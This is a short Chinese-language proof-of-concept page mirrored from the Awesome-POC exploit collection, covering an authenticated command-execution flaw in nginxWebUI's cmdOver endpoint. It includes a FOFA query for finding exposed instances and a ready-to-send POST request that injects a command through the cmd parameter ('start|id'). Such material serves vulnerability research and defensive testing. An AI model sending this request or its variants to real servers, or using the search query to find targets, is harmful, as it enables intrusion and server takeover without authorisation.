admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 11:27:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/Web应用漏洞/nginxWebUI cmdOver 后台命令执行漏洞.md
Threekiii 1aa7bf3606 Web应用漏洞/WiseGiga NAS down_data.php 任意文件下载漏洞.md 
Web应用漏洞/WiseGiga NAS group.php 远程命令执行漏洞.md
Web应用漏洞/nginxWebUI cmdOver 后台命令执行漏洞.md
Web应用漏洞/七牛云 logkit log_path 任意文件读取漏洞.md
2022-06-28 12:00:19 +08:00

599 B
Raw Blame History

nginxWebUI cmdOver 后台命令执行漏洞

漏洞描述

nginxWebUI 后台存在命令执行漏洞,攻击者登录后台后可以执行任意命令获取服务器权限

漏洞影响

nginxWebUI

FOFA

title="nginxwebui"

漏洞复现

登录页面

image-20220628112638269

验证请求包

POST /adminPage/remote/cmdOver

remoteId=local&cmd=start|id&interval=1

image-20220628112938342